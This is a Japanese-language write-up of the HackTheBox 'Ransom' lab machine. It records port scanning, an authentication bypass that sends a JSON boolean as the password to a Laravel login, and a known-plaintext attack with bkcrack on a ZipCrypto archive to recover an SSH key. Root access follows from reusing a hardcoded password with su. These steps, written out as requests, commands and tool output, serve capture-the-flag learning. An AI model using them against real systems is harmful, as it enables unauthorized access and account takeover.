🔥
HackTheBox Ransom
Ransom
侵入
nmap
┌──(kali㉿kali)-[~/Desktop/Ransom]
└─$ sudo nmap -Pn -n -v --reason -sS -p- --min-rate=1000 -A 10.10.11.153 -oN nmap.log
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ea:84:21:a3:22:4a:7d:f9:b5:25:51:79:83:a4:f5:f2 (RSA)
| 256 b8:39:9e:f4:88:be:aa:01:73:2d:10:fb:44:7f:84:61 (ECDSA)
|_ 256 22:21:e9:f4:85:90:87:45:16:1f:73:36:41:ee:3b:32 (ED25519)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Admin - HTML5 Admin Template
|_Requested resource was http://10.10.11.153/login
22、80番を確認
web
ログイン画面が表示された。
Login Bypass
試しに、password と入力し、ログインしてみる
GET /api/login?password=password HTTP/1.1
Host: 10.10.11.153
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://10.10.11.153/login
ログインは失敗するが、Burp Suite を確認すると、入力したパスワードが GET で送られていることがわかった。
POST /api/login HTTP/1.1
Host: 10.10.11.153
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://10.10.11.153/login
password=password
試しに、POST にメソッドを変更し、リクエストを送信してみる
HTTP/1.0 405 Method Not Allowed
Date: Sun, 09 Oct 2022 07:07:51 GMT
Server: Apache/2.4.41 (Ubuntu)
Allow: GET, HEAD
Cache-Control: no-cache, private
Access-Control-Allow-Origin: *
Content-Length: 7665
Connection: close
Content-Type: application/json
{
"message": "The POST method is not supported for this route. Supported methods: GET, HEAD.",
"exception": "Symfony\\Component\\HttpKernel\\Exception\\MethodNotAllowedHttpException",
"file": "/srv/prod/vendor/laravel/framework/src/Illuminate/Routing/AbstractRouteCollection.php",
"line": 117,
"trace": [
405とともに、JSON によるレスポンスが返ってきた
JSON によるバイパスが試せるかもしれないが、ネットで調べても GET による方法がわからない
GET /api/login HTTP/1.1
Host: 10.10.11.153
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://10.10.11.153/login
Content-Type: application/json
Content-Length: 28
{
"password":"password"
}
ダメもとで、POST と同じようにそのまま JSON を書いてみる
HTTP/1.1 200 OK
Date: Sun, 09 Oct 2022 07:42:21 GMT
Server: Apache/2.4.41 (Ubuntu)
Cache-Control: no-cache, private
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 59
Access-Control-Allow-Origin: *
Set-Cookie: laravel_session=eyJpdiI6Img0ZGQ4dlhXSUMvV093NytldzBIN1E9PSIsInZhbHVlIjoiaktES3FkVTIyY0dwbFlZN1FwRlNSVWVUUEp0Ylh6cWN1WW1EY01kU3B0YmRPeENsSm1QbnJ6ckp6L0pGTHluU1pjRkVxTG5CTWh1eTk0bjVYUlBFQ3k2bzBXZzlwald5TXJ5c0I4Y0tlQXlFVG5JNzdCZzVKb2R2S0grR2xLZWMiLCJtYWMiOiI2ZGVmNDk4ZTkyYjg3YzkzMGVlZmZiYTNjODJmYTQzNWE2YzAzYTEzZDdmOTJiNzI3MTZiZDRjZWZkZDU2YmI2IiwidGFnIjoiIn0%3D; expires=Sun, 09-Oct-2022 09:42:21 GMT; Max-Age=7200; path=/; samesite=lax
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8
Invalid Password
Invalid Password とレスポンスが返ってきたため、なぜか JSON 形式でパラメータを渡すことに成功した
GET /api/login HTTP/1.1
Host: 10.10.11.153
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://10.10.11.153/login
Cookie: XSRF-TOKEN=eyJpdiI6Ikk5TUs2dWIxNFFXVU5CQXVneDhNemc9PSIsInZhbHVlIjoiNnV4aWJtN0w4bVY3RENaczRwRXl0T2dQZFZCU2tZYi9qS0ZML0MraWd2Wit4cUxFVVV2TnRyZ2ZPQlY3Z0lSTmUvczl5N3pvcnZYZG1BNEdpWjRIV2hJUnc4SDl5dThQdDQxNU5ZRHYyNmVHeW9TM0tiZzI0aU8vUWhKNUliMnYiLCJtYWMiOiJhNDA4YzlkN2U4ZjMyZjIyYzc1YThjODI5OGJlYmE5YWJkYzAwNTdhOWE4ZjNmN2NlNzM4NmIyNWIwYjEwZjllIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlkxVWZSQnVoMUpmOHJEaFJYWTRQaFE9PSIsInZhbHVlIjoiejY4cTdINEFlbFFBMjJyUnJZbG5XRUM5dmpQRVhpaXoySGZweXo0NElhRTNhL05UazEvK3BmeVRUMGpsSEJYbTdXU05EWjUrbjJMRHFLZnlkNHV5VGkrdG55NjhrbE83QnRna2o0UEFnQVNodkVMWXNnYW5oRWxDUmRmMGVpOEkiLCJtYWMiOiJmYWY5M2RmYTdkZjYxOWIyYWYxNGI2ZDE4NzIwYWFlYjNjOGM5NmUxNDM3MzczZTE3Y2UxZDM3YjAwZWM0Y2QwIiwidGFnIjoiIn0%3D
Content-Type: application/json
Content-Length: 22
{
"password":true
}
バイパスするために、password を true に変更
HTTP/1.1 200 OK
Date: Sun, 09 Oct 2022 07:44:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Cache-Control: no-cache, private
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 59
Access-Control-Allow-Origin: *
Set-Cookie: laravel_session=eyJpdiI6IjdXaWFGRXpybm9qcFhvaHZEZXJyUXc9PSIsInZhbHVlIjoiVDFOeEpmSkdCQUlzVEZFRklpQkZUTTh1aDhwejlFYlpERmRGNlpzYnpwVU1NdlJOanRWZUFaSlArckx3TVJpQmg5N29mTlVWMiswbmpSK2preFl5ZlZUcTFpS0pGZGI4Zm90aXhFR1NMRUFyZGRzcHpLUzVISERORXlGMDdyNHMiLCJtYWMiOiIxYjMxNGIyNWFjNzVjZTEzMjNjMzJmMzY2MjU5ZmZmYjU5M2MxMTEwYmExZGMwZjFhZTZhNmY2Y2U1YWZlMDExIiwidGFnIjoiIn0%3D; expires=Sun, 09-Oct-2022 09:44:25 GMT; Max-Age=7200; path=/; samesite=lax
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8
Login Successful
Login Successful と表示され、バイパスできたことがわかる
homedirectory.zip
実際にログインできたので、サイト内を確認する
zip ファイルと user.txt ファイルがダウンロードできる
┌──(kali㉿kali)-[~/Desktop/Ransom]
└─$ unzip uploaded-file-3422.zip
Archive: uploaded-file-3422.zip
[uploaded-file-3422.zip] .bash_logout password:
zip ファイルをダウンロードし、解凍しようとしたが、パスワードが求められるため、解凍できない
┌──(kali㉿kali)-[~/Desktop/Ransom]
└─$ unzip -l uploaded-file-3422.zip 80 ⨯
Archive: uploaded-file-3422.zip
Length Date Time Name
--------- ---------- ----- ----
220 2020-02-25 21:03 .bash_logout
3771 2020-02-25 21:03 .bashrc
807 2020-02-25 21:03 .profile
0 2021-07-03 03:58 .cache/
0 2021-07-03 03:58 .cache/motd.legal-displayed
0 2021-07-03 03:58 .sudo_as_admin_successful
0 2022-03-07 21:32 .ssh/
2610 2022-03-07 21:32 .ssh/id_rsa
564 2022-03-07 21:32 .ssh/authorized_keys
564 2022-03-07 21:32 .ssh/id_rsa.pub
2009 2022-03-07 21:32 .viminfo
--------- -------
10545 11 files
-l オプションを使用し、中身を見てみると、SSH の秘密鍵を発見した
┌──(kali㉿kali)-[~/Desktop/Ransom]
└─$ zip2john uploaded-file-3422.zip > uploaded-file-3422-hash.zip
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.bash_logout PKZIP Encr: 2b chk, TS_chk, cmplen=170, decmplen=220, crc=6CE3189B
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.bashrc PKZIP Encr: 2b chk, TS_chk, cmplen=1752, decmplen=3771, crc=AB254644
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.profile PKZIP Encr: 2b chk, TS_chk, cmplen=404, decmplen=807, crc=D1B22A87
ver 1.0 uploaded-file-3422.zip/.cache/ is not encrypted, or stored with non-handled compression type
ver 1.0 efh 5455 efh 7875 uploaded-file-3422.zip/.cache/motd.legal-displayed PKZIP Encr: 2b chk, TS_chk, cmplen=12, decmplen=0, crc=0
ver 1.0 efh 5455 efh 7875 uploaded-file-3422.zip/.sudo_as_admin_successful PKZIP Encr: 2b chk, TS_chk, cmplen=12, decmplen=0, crc=0
ver 1.0 uploaded-file-3422.zip/.ssh/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.ssh/id_rsa PKZIP Encr: 2b chk, TS_chk, cmplen=1990, decmplen=2610, crc=38804579
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.ssh/authorized_keys PKZIP Encr: 2b chk, TS_chk, cmplen=475, decmplen=564, crc=CB143C32
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.ssh/id_rsa.pub PKZIP Encr: 2b chk, TS_chk, cmplen=475, decmplen=564, crc=CB143C32
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.viminfo PKZIP Encr: 2b chk, TS_chk, cmplen=581, decmplen=2009, crc=396B04B4
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
解読するために、zip2john を使用したが、上手くいかない
┌──(kali㉿kali)-[~/Desktop/Ransom]
└─$ 7z l -slt uploaded-file-3422.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i5-8259U CPU @ 2.30GHz (806EA),ASM,AES-NI)
Scanning the drive for archives:
1 file, 7735 bytes (8 KiB)
Listing archive: uploaded-file-3422.zip
--
Path = uploaded-file-3422.zip
Type = zip
Physical Size = 7735
----------
Path = .bash_logout
Folder = -
Size = 220
Packed Size = 170
Modified = 2020-02-25 21:03:22
Created =
Accessed =
Attributes = _ -rw-r--r--
Encrypted = +
Comment =
CRC = 6CE3189B
Method = ZipCrypto Deflate
Host OS = Unix
Version = 20
Volume Index = 0
7z で zip ファイルの情報を調べる
今回は ZipCrypto というアルゴリズムが使用されているようだ
Another note about zip cracking is that if you have an
unencrypted/uncompressed copy of any one of the files that are compressed in
the encrypted zip, you can perform a "plaintext attack" and crack the zip, as
detailed here, and explained in this paper. The newer scheme for password-
protecting zip files (with AES-256, rather than "ZipCrypto") does not have
this weakness.
アルゴリズムを HackTricks で調べてみると、ZipCrypto は平文攻撃に脆弱であり、暗号化されたファイルと同じ暗号化されていない状態のファイルを用いることで復号可能らしい
┌──(kali㉿kali)-[~]
└─$ ls -la
total 169732
drwxr-xr-x 26 kali kali 4096 Oct 9 15:15 .
drwxr-xr-x 3 root root 4096 May 31 2021 ..
drwxr-x--- 2 kali kali 4096 Jun 5 11:13 .android
-rw-r--r-- 1 kali kali 32 Aug 20 18:12 .bash_history
-rw-r--r-- 1 kali kali 220 May 31 2021 .bash_logout
-rw-r--r-- 1 kali kali 5349 May 31 2021 .bashrc
-rw-r--r-- 1 kali kali 3526 May 31 2021 .bashrc.original
対応するファイルを探したところ .bash_logout を発見。サイズも同じ220であり使用できそう
bkcrack
今回は、bkcrack というツールを使用する
GitHub -> https://github.com/kimci86/bkcrack
┌──(kali㉿kali)-[~/Desktop/HackTheBox/tool/bkcrack-1.5.0-Linux]
└─$ ./bkcrack -h 16 ⨯
bkcrack 1.5.0 - 2022-07-07
usage: bkcrack [options]
Crack legacy zip encryption with Biham and Kocher's known plaintext attack.
Options to get the internal password representation:
-c, --cipher-file <file> Zip entry or file on disk containing ciphertext
--cipher-index <index> Index of the zip entry containing ciphertext
-C, --cipher-zip <archive> Zip archive containing the ciphertext entry
-p, --plain-file <file> Zip entry or file on disk containing plaintext
--plain-index <index> Index of the zip entry containing plaintext
-P, --plain-zip <archive> Zip archive containing the plaintext entry
-c と -C で暗号化後のファイルを、-p と -P で平文のファイルを指定する必要がある
┌──(kali㉿kali)-[~]
└─$ zip plain.zip .bash_logout
adding: .bash_logout (deflated 28%)
-P で指定するための、平文の zip ファイルを作成
┌──(kali㉿kali)-[~/Desktop/Ransom]
└─$ ./bkcrack -C uploaded-file-3422.zip -c .bash_logout -P plain.zip -p .bash_logout
bkcrack 1.5.0 - 2022-07-07
[17:47:52] Z reduction using 151 bytes of known plaintext
100.0 % (151 / 151)
[17:47:52] Attack on 56903 Z values at index 6
Keys: 7b549874 ebc25ec5 7e465e18
75.5 % (42939 / 56903)
[17:50:14] Keys
7b549874 ebc25ec5 7e465e18
bkcrack を実行すると、内部キーを取得できた
┌──(kali㉿kali)-[~/Desktop/Ransom]
└─$ ./bkcrack -C uploaded-file-3422.zip -k 7b549874 ebc25ec5 7e465e18 -U pass.zip pass
bkcrack 1.5.0 - 2022-07-07
[17:53:10] Writing unlocked archive pass.zip with password "pass"
100.0 % (9 / 9)
Wrote unlocked archive.
キーを使用し pass で解凍可能な zip ファイルを作成
┌──(kali㉿kali)-[~/Desktop/Ransom]
└─$ unzip pass.zip
Archive: pass.zip
[pass.zip] .bash_logout password:
inflating: .bash_logout
inflating: .bashrc
inflating: .profile
creating: .cache/
extracting: .cache/motd.legal-displayed
extracting: .sudo_as_admin_successful
creating: .ssh/
inflating: .ssh/id_rsa
inflating: .ssh/authorized_keys
inflating: .ssh/id_rsa.pub
inflating: .viminfo
解凍に成功した
htb としてのシェル
SSH
解凍した authorized_keys ファイルを確認
┌──(kali㉿kali)-[~/Desktop/Ransom/.ssh]
└─$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDrDTHWkTw0RUfAyzj9U3Dh+ZwhOUvB4EewA+z6uSunsTo3YA0GV/j6EaOwNq6jdpNrb9T6tI+RpcNfA+icFj+6oRj8hOa2q1QPfbaej2uY4MvkVC+vGac1BQFs6gt0BkWM9JY7nYJ2y0SIibiLDDB7TwOx6gem4Br/35PW2sel8cESyR7JfGjuauZM/DehjJJGfqmeuZ2Yd2Umr4rAt0R4OEAcWpOX94Tp+JByPAT5m0CU557KyarNlW60vy79njr8DR8BljDtJ4n9BcOPtEn+7oYvcLVksgM4LB9XzdDiXzdpBcyi3+xhFznFKDYUf6NfAud2sEWae7iIsCYtmjx6Jr9Zi2MoUYqWXSal8o6bQDIDbyD8hApY5apdqLtaYMXpv+rMGQP5ZqoGd3izBM9yZEH8d9UQSSyym/te07GrCax63tb6lYgUoUPxVFCEN4RmzW1VuQGvxtfhu/rK5ofQPac8uaZskY3NWLoSF56BQqEG9waI4pCF5/Cq413N6/M= htb@ransom
ファイルの最後が、htb@ransom となっているため、htb ユーザの存在を予想
┌──(kali㉿kali)-[~/Desktop/Ransom/.ssh]
└─$ ssh -i id_rsa htb@10.10.11.153
The authenticity of host '10.10.11.153 (10.10.11.153)' can't be established.
ECDSA key fingerprint is SHA256:tT45oQAnI0hnOIQg3ZvtoS4RG00xhxxBJua12YRVv2g.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.153' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-77-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Jul 5 11:34:49 2021
htb@ransom:~$ whoami
htb
侵入成功
user フラグ
htb@ransom:~$ cat user.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
フラグ取得成功
権限昇格
sudo
htb@ransom:~$ sudo -l
[sudo] password for htb:
パスワードが求められるため、使用できない
apache2
まずは、バイパスしたパスワード認証のファイルを確認し、設定されているパスワードを探すところから始める
htb@ransom:/etc/apache2/sites-enabled$ cat 000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /srv/prod/public
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
<Directory /srv/prod/public>
Options +FollowSymlinks
AllowOverride All
Require all granted
</Directory>
</VirtualHost>
000-default.conf により、Directory が /srv/ 以下にあることがわかった
htb@ransom:/srv/prod$ cat server.php
<?php
/**
* Laravel - A PHP Framework For Web Artisans
*
* @package Laravel
* @author Taylor Otwell <taylor@laravel.com>
*/
$uri = urldecode(
parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH)
);
// This file allows us to emulate Apache's "mod_rewrite" functionality from the
// built-in PHP web server. This provides a convenient way to test a Laravel
// application without having installed a "real" web server software here.
if ($uri !== '/' && file_exists(__DIR__.'/public'.$uri)) {
return false;
}
require_once __DIR__.'/public/index.php';
Laravel 特有の server.php ファイルを確認した
grep
ログインに成功した場合、Login Successful と表示されるため、利用して検索を行う
htb@ransom:/srv/prod$ grep -r "Login Successful"
resources/views/auth/login.blade.php: if (data === 'Login Successful') {
storage/framework/views/716af88e12f9db05fa041bff2e06875d7f0b09db.php: if (data === 'Login Successful') {
app/Http/Controllers/AuthController.php: return "Login Successful";
3つのファイルが表示されるが、2つは if 文で使われているだけなので、AuthController.php に狙いを絞る
htb@ransom:/srv/prod$ cat app/Http/Controllers/AuthController.php
public function customLogin(Request $request)
{
$request->validate([
'password' => 'required',
]);
if ($request->get('password') == "UHC-March-Global-PW!") {
session(['loggedin' => True]);
return "Login Successful";
}
return "Invalid Password";
}
UHC-March-Global-PW! というパスワードを発見
root としてのシェル
su
先ほど取得したパスワードを使用してみる
htb@ransom:~$ sudo -l
[sudo] password for htb:
Sorry, try again.
上手くいかない
ダメもとで、su を試してみる
htb@ransom:~$ su -
Password:
root@ransom:~# whoami
root
権限昇格に成功した
root フラグ
root@ransom:~# cat root.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
所感
今回のボックスは、JSON 形式でのログインバイパスが非常に興味深いものだった。これは、password の比較の際に、「===」(型まで含めた比較)ではなく、「==」を使用していたことが問題となった。ログインさせる際のパスワードを root でも使い回しているのはかなり怖いと感じた。
Discussion